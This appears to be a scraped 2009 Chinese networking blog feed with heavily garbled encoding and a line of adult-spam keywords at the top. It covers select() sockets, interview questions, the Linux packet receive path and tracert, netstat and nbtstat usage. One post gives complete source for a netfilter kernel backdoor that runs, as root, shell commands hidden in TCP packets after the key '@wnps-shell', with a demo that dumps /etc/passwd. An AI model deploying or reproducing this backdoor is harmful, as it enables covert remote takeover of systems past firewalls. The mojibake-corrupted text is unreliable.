久久精品国产亚洲AV香蕉,亚洲国产成人九九综合,亚洲校园春色小说

socket�~�程

矛_��@ — Mon, 14 Dec 2009 03:35:00 GMT

今天只想谈一谈关于阻塞和非阻塞的socket�?/p>

调用socket函数得到的socket的文件标�C�符�Q�默认情况下是一个阻塞的socket�Q�从应用角度�Q�就是每当调用accept�Q�recv,send �{�函数的时候，如果�Ҏ��没有相应�Q�那么进�E�会��d��在那里，直到�Ҏ��相应。这在应用中有很多不便，��其是在windows环境中的�~�程�Q�如果进�E�被��d��那么看上��L��一点像��L��的感觉�?/p>

其实把一个socket讄��为非��d��的也很简单。但是，应用select函数�Q�阻塞socket也可以到辄��似的效果。一会详�l�讨论�?/p>

先考虑一个TCP的连接，当服务器�E�序listen以后�Q�如果直接调用accept�Q�那么进�E�会��d��在那里，一直到被client端connect�Q�然�? 开启一个新的线�E�处理客��L��服务�Q�主�U�程�l�箋监听��h��。这样可以实现同时处理多个客��L��q�接�Q�但是这��h��会阻塞主�U�程�Q�不是一个好的办法。其实，我当然也可添加一个线�E�，�?#8220;后台”accept�Q�但是我觉得�q�里面有一个多�U�程操作同一个文件描�q�符socket的问题。也不是很好。也��是��_��如果只用到线�E? 机制�Q��ƈ不能很好的解决阻塞的问题�?/p>

select函数可以对一套文件描�q�符操作�Q�windows里叫handle,我觉得没�?a style="width: 20px; height: 20px; text-indent: 20px; background-repeat: no-repeat; background-image: url(/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=anchor.gif);" name="baidusnap3">什�?/strong>�? 质的区别。都是进�E�空间里面的一个整数而已�Q�，观察�q�套文�g描述�W�的可读或可写的情况。这样就�l�我们提供这样一个思�\�Q�只有当一个socket是可�ȝ��Q? 也就是有�q�程�q�接��h��connect或是对套接口write,那么才去调用accept或是read�Q�这样就可以避免��d��了�?/p>

以准备accept的套接口��Z��Q�如果调用socket函数得到的文件描�q�符为s=3�Q�那么，我可以调用select监视所�?以下的文件描�q�符的读写特性�? select(s+1,&fd_readset,&fd_writeset,&fd_errorset,&tv_time). �q�个函数是内核等待特定事件的函数�Q��ƈ不是只有套接口可以用。原型是

int select(int maxfdp1,fd_set *readset,fd_set *writeset,fd_set *exceptset,const struct timeval *timeout);

�W�一个参数表�C��察的最大的文�g描述�W�，一般是你想要观察的socket+1�Q? �W�二个参数是可读文�g描述�W�set,�W�三个是可写set,�W�四个参数是error set�Q�第五个是超时的旉��。如果在��时的时间内没有观察�q��Q何改动，那么函数会清�I��几个set�Q�我个�h理解�Q�，�q�且�q�回0�Q�如果出错，会返�?1。否则返�?gt;0�Q��ƈ且只把可读（可写�Q�的文�g描述�W�保留在对应的set内。所以只要在调用select以前�Q�把�{�待�q�接的套接口攑ֈ�可读set中，如果发生connect�Q�select会返�?gt;0,�q�时候可以观察一下套接口是否�q�在�q�个set中，如果是，则说明有��h��。这个方法可以用于多个套接口同时监听多个端口的情��c��也可以用于一个已�l�连接的套接口等待对方发送的消息�Q�比如write�?/p>
对于set的操作，有如下几个宏:FD_ZERO,FD_SET,FD_ISSET,FD_CLR.

fd_set myset; //定义描述字集数据�c�d��

FD_ZERO (&myset); //�Ҏ��q�字集初始化

FD_SET(s, &myset); //打开描述字的�W�s�?也即把套接口加入set�?/p>
FD_ISSET(s, &myest) //��试描述字的�W�s�?�q�个宏一般是在select之后才会用到�?/p>
FD_CLR(s, &myset�Q?// //关闭描述字的�W�s�?��是在set中清除s.

�q�个函数的��用方法，可以参见下面的程序。就不再�l�诉了�?/p>
FD_ZERO(&fs_ReadSet);
FD_SET(iSockets, &fs_ReadSet);
iSockNum = iSockets+1;

while(1)
{
FD_ZERO(&fs_WriteSet);
for (iSocketz = 0; iSocketz {
if (FD_ISSET(iSocketz, &fs_ReadSet))
FD_SET(iSocketz, &fs_WriteSet);
}

tv_time.tv_sec = 2;
tv_time.tv_usec = 500000;
iRtn = select(iSockNum, &fs_WriteSet, NULL, NULL, &tv_time);
if (iRtn == -1)
{
printf("function select error\n");
goto error;
}
else if(iRtn == 0)
{
continue;
}

if (FD_ISSET(iSockets, &fs_WriteSet))
{
iSockLen = sizeof(sa_client);
iSocketz = accept(iSockets, (struct sockaddr*)&sa_client, &iSockLen);
if (iSocketz == -1)
{
printf("function accept error \n");
goto error;
}
printf("z : %d\n", iSocketz);

if (iSocketz >=MAX_CLIENT)
{
close(iSocketz);
continue;
}
if (iSockNum < iSocketz+1)
iSockNum = iSocketz+1;
FD_SET(iSocketz, &fs_ReadSet);

}

for (iSocketz=iSockets+1; iSocketz < iSockNum; iSocketz++)
{

if (FD_ISSET(iSocketz, &fs_WriteSet))
{
memset(pRcvBuf, 0, BUFFERSIZE);
memset(pSndBuf, 0, BUFFERSIZE);
iRtn = read(iSocketz, pRcvBuf, BUFFERSIZE);
if (iRtn == -1)
{
printf("function read error \n");
goto error;
}

printf("%s\n", pRcvBuf);

pSndBuf[0] = 0;
strcpy(pSndBuf, "fuck");
iBufLen = sizeof("fuck");

iRtn = write(iSocketz, pSndBuf, iBufLen);
if (iRtn == -1)
{
printf("function write error \n");
goto error;
}

if(strcmp(pRcvBuf,"exit")==0)
{
FD_CLR(iSocketz, &fs_ReadSet);
close(iSocketz);
}
}

}
for (iSocketz = iSockNum-1; (iSocketz >iSockets&&!FD_ISSET(iSocketz, &fs_ReadSet)); iSocketz = iSockNum-1)
{
iSockNum = iSocketz;
}
//printf("isockNum: %d\n",iSockNum);
}

至于套接口的通信�Q�我�q�想说一点，套接口和文�g��道差不多，一方读一方写�Q�read会阻塞到�Ҏ��write�Q�而write不会��d��。应该是�q�样了。如果我个�h对这个部分的理解有错误。会在以后改正�?/p>

矛_��@ 2009-12-14 11:35 发表评论

矛_��@ — Thu, 03 Dec 2009 07:51:00 GMT
基础部䆾:

1.下列�E�序�?2位linux或unix中的�l�果是什么？
func(char *str)
{
    printf("%d",sizeof(str));
    printf("%d",strlen(str));
}
main()
{
    char a[]="123456789";

    printf("%d",sizeof(a));

    func(a);
}

�{? 10   4   9

�|�络/�|�络�~�程部䆾:

1、connect�Ҏ��会阻塞，请问有什么方法可以避免其长时间阻塞？
�{?最通常的方法最有效的是加定时器�Q�也可以采用非阻塞模式�?br />
2、网�l�中�Q�如果客��L��H�然掉线或者重启，服务器端怎么��h��能立�ȝ��道？
�{?若客��L��掉线或者重新启动，服务器端会收到复位信��P��每一�U�tcp/ip得实��C��一��P��控制机制也不一栗��?br />
3.在子�|?10.27.48.21/30�U�有多少个可用地址�Q�分别是什么？
�{?

��:
30表示的是�|�络�?network number)�?0位，剩下2位中11是广�?broadcast)地址�Q?0是multicast地址�Q�只�?1�?0可以作�ؓhost address�?br />
�?
210.27.48.21/30 代表的子�|�的�|�络��h��30位，即网�l�号�?10.27.48.21 & 255.255.255.251=210.27.48.20�Q�此子网的地址�I�间�?位，卛_��以有4个地址�Q?10.27.48.20, 210.27.48.21, 210.27.48.22, 210.27.48.23。第一个地址的主机号(host number/id)�?�Q�而主机号0代表的是multicast地址。最后一个地址的最后两位是11�Q�主机号每一位都�?代表的是�q�播 (broadcast)地址。所以只有中间两个地址可以�l�host使用。其实那个问题本�w�不准确�Q�广播或multicast地止也是可以使用的地址�Q�所�? 回答4也应该正��，当然问的��Z��可能是想要你回答2。我个�h觉得最好的回答是一个广播地址�Q�一个multicast地址�Q?个unicast地址�?br />
4.TTL是什么？有什么用处，通常那些工具会用到它�Q�（ping? traceroute? ifconfig? netstat?�Q?/strong>
�{?
��:TTL是Time To Live�Q�一般是hup count�Q�每�l�过一个�\由就会被减去一�Q�如果它变成0�Q�包会被丢掉。它的主要目的是防止包在有回路的�|�络上死转，��费�|�络资源。ping和traceroute用到它�?br />
�?TTL 是Time To Live�Q�目前是hup count�Q�当包每�l�过一个�\由器它就会被减去一�Q�如果它变成0�Q��\由器��׃��把包丢掉。IP�|�络往往带有�?loop)�Q�比如子�|�A和子�|�B有两个�\由器相连�Q�它��是一个loop。TTL的主要目的是防止包在有回路的�|�络上死转，因�ؓ包的TTL最�l�后变成0而��得此包从�|�上消失(此时往往路由器会送一�? ICMP包回来，traceroute��是�Ҏ��q�个做的)。ping会送包出去�Q�所以里面有它，但是ping不一定非要不可它。traceroute则是完全因�ؓ有它才能成的。ifconfig是用来配�|�网卡的�Q�netstat -rn 是用来列路由表的�Q�所以都用不着�?br />
5.路由表示做什么用的？在linux环境中怎么来配�|�一条默认�\由？
�{?
��:路由表是用来军_��如何��包从一个子�|�传送到另一个子�|�的�Q�换局话说��是用来军_��从一个网卡接收到的包应该送的哪一张网卡上的。在Linux上可以用“route add default gw <默认路由器IP>”来配�|�一条默认�\由�?br />
�? 路由表是用来军_��如何��包从一个子�|�传送到另一个子�|�的�Q�换局话说��是用来军_��从一个网卡接收到的包应该送的哪一张网卡上的。�\��p��的每一行至��有目标�|? �l�号、netmask、到�q�个子网应该使用的网卡。当路由器从一个网卡接收到一个包�Ӟ��它扫描�\��p��的每一行，用里面的netmask和包里的目标IP�? 址做�ƈ逻辑�q�算(&)扑և�目标�|�络��P��如果此网�l�号和这一行里的网�l�号相同��将�q�条路由保留下来做�ؓ备用路由�Q�如果已�l�有备用路由了就在这两条�? 由里��网�l�号最长的留下来，另一条丢掉，如此接着扫描下一行直到结束。如果扫描结束�Q没有扑ֈ��M��路由�Q�就用默认�\由。确定�\由后�Q�直接将包送到对应的网卡上厅R��在具体的实��C��Q��\��p��可能包含更多的信息�ؓ选�\��q��法的�l�节所用。题外话�Q��\��q��法其实效率很差，而且不scalable�Q�解军_��法是使用IP 交换机，比如MPLS�?br /> 在Linux上可以用“route add default gw <默认路由器IP>”来配�|�一条默认�\由�?br />
6.在网�l�中有两��C��机A和B�Q��ƈ通过路由器和其他交换讑֤��q�接��h��Q�已�l�确认物理连接正��无误，怎么来测试这两台机器是否�q�通？如果不通，怎么来判断故障点�Q�怎么排除故障�Q?/strong>
�{?��试�q�两台机器是否连通：从一台机器ping另一台机�?br />      如果ping不通，用traceroute可以��定是哪个�\由器不能�q�通，然后再找问题是在交换讑֤�/hup/cable�{��?br />
7.�|�络�~�程中设计�ƈ发服务器�Q��用多�q�程 �?多线�E?�Q�请问有什么区别？
�{�案一:
1�Q�进�E�：子进�E�是父进�E�的复制品。子�q�程获得父进�E�数据空间、堆和栈的复制品�?br /> 2�Q�线�E�：相对与进�E�而言�Q�线�E�是一个更加接�q�与执行体的概念�Q�它可以与同�q�程的其他线�E�共享数据，但拥有自��q��栈空��_��拥有独立的执行序列�?br /> 两者都可以提高�E�序的�ƈ发度�Q�提高程序运行效率和响应旉��?br /> �U�程和进�E�在使用上各有优�~�点�Q�线�E�执行开销��，但不利于资源��理和保护；而进�E�正相反。同�Ӟ��U�程适合于在SMP机器上运行，而进�E�则可以跨机器迁�U�R�?br />
�{�案�?
�Ҏ��区别��׃��点：用多�q�程每个�q�程有自��q��地址�I�间(address space)�Q�线�E�则�׃�n地址�I�间。所有其它区别都是由此而来的：
1。速度�Q�线�E��生的速度快，�U�程间的通讯快、切换快�{�，因�ؓ他们在同一个地址�I�间内�?br /> 2。资源利用率�Q�线�E�的资源利用率比较好也是因�ؓ他们在同一个地址�I�间内�?br /> 3。同步问题：�U�程使用公共变量/内存旉��要��用同步机制还是因��Z��们在同一个地址�I�间内�?

矛_��@ 2009-12-03 15:51 发表评论

矛_��@ — Wed, 02 Dec 2009 05:32:00 GMT

2.6.24.4内核�|�络接收数据包分�?br /> 瀚�v书香

�?.6.24.4中所有的�|�卡�Q�不��是否支持napi�Q�都是通过struct napi_struct�l�构�q�行。所有我们先说一下这个结构�?br /> struct napi_struct{
   struct list_head poll_list;
   unsigned long state;
   int weight;
   int (*poll)(struct napi_struct *,int);
}
对应支持napi的网卡，自己填充�q�个�l�构体；而非napi�|�卡�Q�则使用per cpu的softnet_data>backlog,�q�个�l�构的初始化在net_dev_init()中完成�?br /> 我们先说一下非napi机制的网卡：
    �|�卡接收到数据包后dma到内核空��_��然后调用netif_rx()��数据包挂接到softnet_data>input_pkt_queue中，如果backlog�q�个napi_struct没有被调度，则napi_schedule(&backlog).napi_schedule() 会将backlog的poll_list挂接到softnet_data->poll_list上，同时出发软中断NET_RX_SOFTIRQ�? NET_RX_SOFTIRQ软中断，调用相应的函数net_rx_action()�?/div>
对应napi机制的网卡：
     �|�卡初始化是会自己初始化一个自��q��数据包接攉��列，当有数据包到达时�Q�将数据包dma到自��q��数据包队列中�Q�如果自��q��napi没有调度�Q�则 napi_schedule(mynapi),�q�里的mynapi是网卡自��q��napi_struct.napi_schedule()会将�|�卡自己�? poll_list挂接到softnet_data->poll_list上，同时出发软中断NET_RX_SOFTIRQ�? NET_RX_SOFTIRQ软中断，调用相应的函数net_rx_action()�?/div>

net_rx_action()�Q?br />     首先获取softnet_data->poll_list�Q�通过遍历poll_list�Q�获取每个poll_list对应的napi_struct �l�构(container_of实现)�Q�然后根据napi_struct的weight调用poll函数�Q�如果是非napi�|�卡�Q�这里的 napi_struct是backlog�Q�所以poll函数��是process_backlog;如果是napi的网卡，则会使自��q��poll函数�?br /> napi�|�卡的poll函数��是从自己数据包队列中dequeue��Z��个skb,然后调用netif_receive_skb().
非napi的process_backlog会获取softnet_data->input_pkt_queue�Q�然后对队列input_pkt_queue�q�行dequeue操作�Q�获得一个skb�Q�之后调用netif_receive_skb(skb)�?/div>
netif_receive_skb():
    对skb做一些准备工作，例如讄��mac_len�{�，调用deliver_skb()�l�所有的注册ptype_all�c�d��的协议处理handle�Q�然后是 �|�桥和VLAN的处理，之后会给注册的相应协议的ptype_base的handle。这里假设是ip协议�Q�则会调用相应的ip协议handle的处理函数ip_rcv�?/div>
ip_rcv():
    对skb做一些检查工�?如果skb->users!=1�Q�则clone一个skb,之后会�{入netfilter�? NF_IP_PRE_ROUTING的hook点，调用所有在该点注册的hook函数。比如说如果开启了conntrack�Q�则会在�q�里�q�行数据包重�l��? 之后调用ip_rcv_finish().

ip_rcv_finish():
    首先调用ip_route_input()军_��数据包的路由�Q�初始化skb->dst�Q�调用dst_input(skb).

dst_input():
    实际上是调用skb->dst->input(skb)�Q�对应input的初始化在route.c中。如果是发往本地的数据包 dst->input=ip_local_deliver;如果是�{发的数据包dst->input=ip_forward;

本地��程�Q?br /> ip_local_deliver():
    首先是对分片的数据包重组�Q�会转入netfilter的NF_IP_LOCAL_IN的hook点，调用所有在该点注册的hook函数。之后会调用ip_local_deliver_finish()�Q�之后就到第四层了�?/div>
转发��程�Q?br /> ip_forward():
    做一些源路由�{�方面的��查后�Q�会转入netfilter的NF_IP_FORWARD的hook点，调用所有在该点注册的hook函数。之后会调用ip_forward_finish().

ip_forward_finish():
    调用dst_output().

dst_output():
    skb->dst->output(skb).一般output=ip_output.

ip_output():
    讄��skb的dev为发包的dev,同时讄��skb->protocol,会�{入netfilter的NF_IP_POST_ROUTING的hook点，调用所有在该点注册的hook函数。之后会调用ip_finish_output().

ip_finish_output():
    ��查一下数据包是否需要分片，如果需要分片，则进行ip_fragement()�Q�之后调用ip_finish_output2().

ip_finish_output2():
    �Ҏ��neighbour�Q�调用dst->neighbour->output.

到这为止�Q�数据包会经�q�dev_queue_xmit攑օ�dev的qdisc中。之后就是流控出队列�?br />
出处:http://pengliang.cublog.cn

矛_��@ 2009-12-02 13:32 发表评论

利用netfilter来突破防火墙�Q?实现�q�程执行命��o

矛_��@ — Wed, 04 Nov 2009 13:33:00 GMT
前几天看了rwrk�q�个rk的demo, 它就是利用netfilter hook住了�q�入��L��的数据包�Q? hook�Ҏ��NF_IP_PRE_ROUTING�Q?因此可以在进入iptables之前提前实现数据包的�q��o。在�q�个hook点上作文章就比较多了�Q? 可以实现防火墙，嗅探器，当然也可以用来触发回�q�后门， wnps��是�q�么来作的，因此不管��L��防火墙作的规则如何变态，都有��Z��I�K��它。下面这个demo用来演示分析tcp包的内容�Q?分析出里面的命��o�Q?然后��L��行它�Q?有点�c�M��以前的icmp, ip包后门，只不�q�这些都在内核来完成�Q?功能更强大�?br /> demo在ubuntu8.10 + 2.6.28上测试成功�?br />
wzt@wzt-laptop:~$ nc -vv localhost 22
localhost [127.0.0.1] 22 (ssh) open
SSH-2.0-OpenSSH_5.1p1 Debian-3ubuntu1
@wnps-shell:cat /etc/passwd > /home/wzt/pass.log
Protocol mismatch.
sent 49, rcvd 58

demsg:
[ 957.255416] kexec test start ...
[ 1029.692964] hook: function:hook_func-L125: got the tcp key .
[ 1029.692981] hook: function:hook_func-L127: cat /etc/passwd > /home/wzt/pass.log
[ 1029.692985]

wzt@wzt-laptop:~$ ls -lht pass.log
-rw-r--r-- 1 root root 1.7K 2009-06-04 08:08 pass.log

+---------------------------------------------------------------------+

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define HOOK_DEBUG

#ifdef HOOK_DEBUG
#define DbgPrint(format, args...) \
        printk("hook: function:%s-L%d: "format, __FUNCTION__, __LINE__, ##args);
#else
#define DbgPrint(format, args...) do {} while(0);
#endif

#define TCP_SHELL_KEY   "@wnps-shell"

#define PORT_NUM    6
#define IP_NUM        20
#define BUFF_NUM    512

MODULE_LICENSE("GPL");
MODULE_AUTHOR("wzt");

struct exec_work {
    struct work_struct work;
    char *cmd;
};

static struct nf_hook_ops nfho;

int kexec_user_app(void *data)
{
    struct exec_work *work = data;
    int ret;
    char *argv[] = {"/bin/sh", "-c", work->cmd, NULL};
        char *envp[] = { "HOME=/",
                         "TERM=linux",
                         "PATH=/sbin:/usr/sbin:/bin:/usr/bin",
                         NULL };
    ret = call_usermodehelper(argv[0], argv, envp, 1);

    return ret;
}

int execute_user_command(char *cmd)
{
    struct exec_work *exec_work;

    exec_work = kmalloc(sizeof(struct exec_work), GFP_ATOMIC);
    exec_work->cmd = kmalloc(1024*sizeof(char), GFP_ATOMIC);

    INIT_WORK(&exec_work->work, kexec_user_app);
    strncpy(exec_work->cmd, cmd, strlen(cmd) + 1);

    schedule_work(&exec_work->work);

    return 0;
}

unsigned int hook_func(unsigned int hooknum,
                       struct sk_buff **skb,
                       const struct net_device *in,
                       const struct net_device *out,
                       int (*okfn)(struct sk_buff *))
{
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,22)
        struct sk_buff *sk = skb_copy(skb, 1);
#else
    struct sk_buff *sk = *skb;
#endif
        struct iphdr *ip;
    struct tcphdr *tcphdr;
    char buf[BUFF_NUM], *data = NULL;
    char *p;

        if (!sk)
                return NF_ACCEPT;

#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,22)
    ip = ip_hdr(sk);
#else
    ip = sk->nh.iph;
#endif

        switch (ip->protocol) {
                case 1:
                        return NF_ACCEPT;

                case 6:
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,22)
                        tcphdr = ip_hdr(sk);

                        tcphdr =
                                (struct tcphdr *)((void *)sk->data +
                                        ((struct iphdr *)sk->data)->ihl * 4);

            data = (char *)((int *)tcphdr + (int)(tcphdr->doff));
#else
                        tcphdr = (struct tcphdr *)((__u32 *)ip + ip->ihl);

            data = (char *)((int *)tcphdr + (int)(tcphdr->doff));
#endif

                        /*
                         * filter the connected tcp packet
                         */
            if ((p = strstr(data, TCP_SHELL_KEY)) != NULL) {
                DbgPrint("got the tcp key .\n");
                p += strlen(TCP_SHELL_KEY) + 1;
                DbgPrint("%s\n", p);
                execute_user_command(p);
                                goto out;
            }

            out:
            memset(buf, '\0', BUFF_NUM);

                        return NF_ACCEPT;

                default:
                        return NF_ACCEPT;
        }
}

static int kexec_test_init(void)
{
    printk("kexec test start ...\n");

    nfho.hook = hook_func;
    nfho.owner = NULL;
    nfho.pf = PF_INET;

#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,22)
        nfho.hooknum = NF_INET_PRE_ROUTING;
#else
        nfho.hooknum = NF_IP_PRE_ROUTING;
#endif

    nfho.priority = NF_IP_PRI_FIRST;

    nf_register_hook(&nfho);

    return 0;
}

static void kexec_test_exit(void)
{
    printk("kexec test exit ...\n");
    nf_unregister_hook(&nfho);
}

module_init(kexec_test_init);
module_exit(kexec_test_exit);

矛_��@ 2009-11-04 21:33 发表评论

tracert命��o

矛_��@ — Tue, 18 Aug 2009 13:38:00 GMT

tracert命��o

Tracert 工作原理

　　通过向目标发送不�?IP 生存旉�� (TTL) 值的“Internet 控制消息协议 (ICMP)”回应数据包，Tracert 诊断�E�序��定到目标所采取的�\由。要求�\径上的每个�\由器在�{发数据包之前臛_��数据包上的 TTL 递减 1。数据包上的 TTL 减�ؓ 0 �Ӟ��路由器应该将“ICMP 已超�?#8221;的消息发回源�pȝ��?

　　Tracert 先发�?TTL �?1 的回应数据包�Q��ƈ在随后的每次发送过�E�将 TTL 递增 1�Q�直到目标响应或 TTL 辑ֈ�最大��|��从而确定�\由。通过��查中间�\由器发回�?#8220;ICMP 已超�?#8221;的消息确定�\由。某些�\由器不经询问直接丢弃 TTL �q�期的数据包�Q�这�? Tracert 实用�E�序中看不到�?

tracert命��o参数

-d

防止 tracert 试图��中间�\由器�?IP 地址解析为它们的名称。这样可加速显�C?tracert 的结果�?/p>
-h MaximumHops

指定搜烦目标�Q�目的）的�\径中存在的跃点的最大数。默认��gؓ 30 个跃炏V�?/p>
-j HostList

指定回显��h��消息��?IP 报头中的松散源�\由选项�?HostList 中指定的中间目标集一起��用。��用松散源路由�Ӟ��q�箋的中间目标可以由一个或多个路由器分隔开。HostList 中的地址或名�U�的最大数量�ؓ 9。HostList 是一�p�d��q��格分隔的 IP 地址�Q�用带点的十�q�制�W�号表示�Q�。仅当跟�t?IPv4 地址时才使用该参数�?/p>
-w Timeout

指定�{�待“ICMP 已超�?#8221;�?#8220;回显�{�复”消息�Q�对应于要接收的�l�定“回现��h��”消息�Q�的旉��Q�以毫秒为单位）。如果超时时间内未收到消息，则显�C�Z��个星�?(*)。默认的��时旉��?4000�Q? �U�）�?/p>
-R

指定 IPv6 路由扩展标头应用来将“回显��h��”消息发送到本地��L��Q��用目标作��Z��间目标�ƈ��试反向路由�?/p>
-S

指定�?#8220;回显��h��”消息中��用的源地址。仅当跟�t?IPv6 地址时才使用该参数�?/p>
-4

指定 Tracert.exe 只能��?IPv4 用于本跟�t��?/p>
-6

指定 Tracert.exe 只能��?IPv6 用于本跟�t��?/p>
TargetName

指定目标�Q�可以是 IP 地址或主机名�?/p>
-?

在命令提�C�符下显�C�帮助�?/p>
注释
• 该诊断工具通过向目标发送具有变化的“生存旉�� (TTL)”值的“ICMP 回响��h��”消息来确定到辄��标的路径。要求�\径上的每个�\由器在�{发数据包之前臛_��?IP 数据包中�?TTL 递减 1。这��P��TTL ��成为最大链路计数器。数据包上的 TTL 到达 0 �Ӟ��路由器应该将“ICMP 已超�?#8221;的消息发送回源计��机。Tracert 发�?TTL �? 1 的第一�?#8220;回响��h��”消息�Q��ƈ在随后的每次发送过�E�将 TTL 递增 1�Q�直到目标响应或跃点辑ֈ�最大��|��从而确定�\径。默认情况下跃点的最大数量是 30�Q�可使用 -h 参数指定。检查中间�\由器�q�回�?#8220;ICMP ��时”消息与目标返回的“回显�{�复”消息可确定�\径。但是，某些路由器不会�ؓ�?TTL 值已�q�期的数据包�q�回“已超�?#8221;消息�Q�而且�q�些路由器对�? tracert 命��o不可见。在�q�种情况下，��ؓ该跃�Ҏ��C�Z��行星�?(*)�?

• 要跟�t��\径�ƈ��\径中的每个�\由器和链路提供网�l��g�q�和数据包丢�׃��息，请��?pathping 命��o�?

• 只有�?#8220;Internet 协议 (TCP/IP)”协议�?#8220;�|�络�q�接”中安装�ؓ�|�络适配器属性的�l��g�Ӟ��该命令才可用�?/p>
�q�是验证通往�q�程��L��路径的实用程�?
用法�Q?tracert �Q?d�Q?�Q?h maximum_hops�Q?�Q?j host-list�Q?�Q?w timeout�Q?target_name

�C�Z��
要跟�t�名�?corp7.microsoft.com 的主机的路径�Q�请键入�Q?/p>
tracert corp7.microsoft.com

要跟�t�名�?corp7.microsoft.com 的主机的路径�q��止将每个 IP 地址解析为它的名�U�ͼ�请键入：

tracert -d corp7.microsoft.com

要跟�t�名�?corp7.microsoft.com 的主机的路径�q��用松散源路由 10.12.0.1-10.29.3.1-10.1.44.1�Q�请键入�Q?/p>
tracert -j 10.12.0.1 10.29.3.1 10.1.44.1 corp7.microsoft.com

执行tracert命��o�?会有如下�l�果,�q�其中的�W?�?�W?�?�W?列�ؓ何有三个旉��,如果要表�C�经�q�该IP的时�?分别�Ҏ��一跳的地址发送三个测试包�Q�所以有三个旉��Q�分别是最��、��^均、最大时间�?



   C:\>tracert    -d   www.hzcnc.com
   Tracing    route    to   www.hzcnc.com    [218.108.250.243]
   over    a    maximum    of    30    hops:

       1        <10    ms        <10    ms        <10    ms      210.83.128.110
       2        <10    ms        <10    ms        <10    ms      210.83.128.110
       3          11    ms        <10    ms        <10    ms      218.108.253.241
       4        <10    ms          10    ms        <10    ms      218.108.254.34
       5          10    ms        <10    ms          10    ms      218.108.252.66
       6        <10    ms        <10    ms        <10    ms      218.108.250.243

    在下例中�Q�数据包必须通过两个路由器（10.0.0.1 �?192.168.0.1�Q�才能到达主�?
172.16.0.99。主机的默认�|�关�?10.0.0.1�Q?92.168.0.0 �|�络上的路由器的 IP �?
址�?192.168.0.1�?

C:�Q?gt;tracert 172.16.0.99 -d
Tracing route to 172.16.0.99 over a maximum of 30 hops
1 2s 3s 2s 10,0.0,1
2 75 ms 83 ms 88 ms 192.168.0.1
3 73 ms 79 ms 93 ms 172.16.0.99
Trace complete.
�?tracert 解决问题
可以使用 tracert 命��o��定数据包在�|�络上的停止位置。下例中�Q�默认网关确�?19 2.168.10.99 ��L��没有有效路径�?br /> �q�可能是路由器配�|�的问题�Q�或者是 192.168.10. 0 �|�络不存在（错误�?IP 地址�Q��?

C:�Q?gt;tracert 192.168.10.99

Tracing route to 192.168.10.99 over a maximum of 30 hops

1 10.0.0.1 reportsestination net unreachable.

Trace complete.

Tracert 实用�E�序对于解决大网�l�问题非常有用，此时可以采取几条路径到达同一�?
炏V�?

矛_��@ 2009-08-18 21:38 发表评论

netstat 命��o用法

矛_��@ — Tue, 18 Aug 2009 13:37:00 GMT

开始运行netstat命��o既可�Q�可�q�命令还有其它功能�?

如：你想知道�Ҏ��能IP地址�Q�不访用netstat命��o可以直接在dos直行�Q�用法，netstat -n

-A 昄��M��兌��的协议控制块的地址。主要用于调�?
-a 昄��所有套接字的状态。在一般情况下不显�C�Z��服务器进�E�相兌��的套接字
-i 昄��自动配置接口的状态。那些在�pȝ��初始引导后配�|�的接口状态不在输��Z��?
-m 打印�|�络存储器的使用情况
-n 打印实际地址�Q�而不是对地址的解释或者显�C�Z��机，�|�络名之�cȝ��W�号
-r 打印路由选择�?
-f address -family对于�l�出名字的地址��打印统计数字和控制块信息。到目前为止�Q�唯一支持的地址��是inet
-I interface 只打印给出名字的接口状�?
-p protocol-name 只打印给出名字的协议的统计数字和协议控制块信�?
-s 打印每个协议的统计数�?
-t 在输出显�C�Z��用时间信息代曉K��列长度信息�?

netstat命��o的列标题
Name 接口的名�?
Mtu 接口的最大传输单�?
Net/Dest 接口所在的�|�络
Address 接口的IP地址
Ipkts 接收到的数据包数�?
Ierrs 接收到时已损坏的数据包数�?
Opkts 发送的数据包数�?
Oeers 发送时已损坏的数据包数�?
Collisions ��p��个接口所记录的网�l�冲�H�数�?/p>

矛_��@ 2009-08-18 21:37 发表评论

Nbtstat 命��o用法

矛_��@ — Tue, 18 Aug 2009 13:36:00 GMT

Nbtstat

昄��Z�� TCP/IP �?NetBIOS (NetBT) 协议�l�计资料、本地计��机和远�E�计��机�?NetBIOS 名称表和
NetBIOS 名称�~�存。Nbtstat 可以��h�� NetBIOS 名称�~�存和��?Windows Internet 名称服务 (WINS)
注册的名�U�。��用不带参数的 nbtstat 昄��帮助�?

语法

nbtstat[-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [Interval]

参数

-a remotename

昄��q�程计算机的 NetBIOS 名称表，其中�Q�RemoteName 是远�E�计��机�?NetBIOS 计算机名�U�。NetBIOS
名称表是与运行在该计��机上的应用�E�序相对应的 NetBIOS 名称列表�?

-A IPAddress

昄��q�程计算机的 NetBIOS 名称表，其名�U�由�q�程计算机的 IP 地址指定�Q�以��数点分隔）�?

-c

昄�� NetBIOS 名称�~�存内容、NetBIOS 名称表及其解析的各个地址�?

-n

昄��本地计算机的 NetBIOS 名称表。Registered 的状态表明该名称是通过�q�播�q�是 WINS 服务器注册的�?

-r

昄�� NetBIOS 名称解析�l�计资料。在配置��Z��?WINS 且运�?Windows XP �?Windows Server 2003 �?br /> 作系�l�的计算��Z��Q�该参数��返回已通过�q�播�?WINS 解析和注册的名称��L��?

-R

清除 NetBIOS 名称�~�存的内容�ƈ�?Lmhosts 文�g中重新加载带�?#PRE 标记的项目�?

-RR

释放�q�刷新通过 WINS 服务器注册的本地计算机的 NetBIOS 名称�?

-s

昄�� NetBIOS 客户端和服务器会话，�q�试囑ְ�目标 IP 地址转化为名�U��?

-S

昄�� NetBIOS 客户端和服务器会话，只通过 IP 地址列出�q�程计算机�?

Interval

重新昄��选择的统计资料，可以在每个显�C�内容之间中�?Interval 中指定的�U�数。按 Ctrl+C 停止重新
昄��l�计信息。如果省略该参数�Q�netstat ��只昄��一�ơ当前的配置信息�?

/?

在命令提�C�符下显�C�帮助�?

注释

• Nbtstat 命��o行参数区分大��写�?

• 下表描述�?nbtstat 生成的列标题�?

标题描述

Input

接收的字节数�?

Output
发送的字节数�?

In/Out
该连接是否从计算��Z��出或者从其他计算��Z��入到本地计算机�?

Lift
名称表缓存项在被清除之前所存留的时间�?

Local Name
与连接相关的本地 NetBIOS 名称�?

Remote Host
与远�E�计��机相关的名�U�或 IP 地址�?

<03>
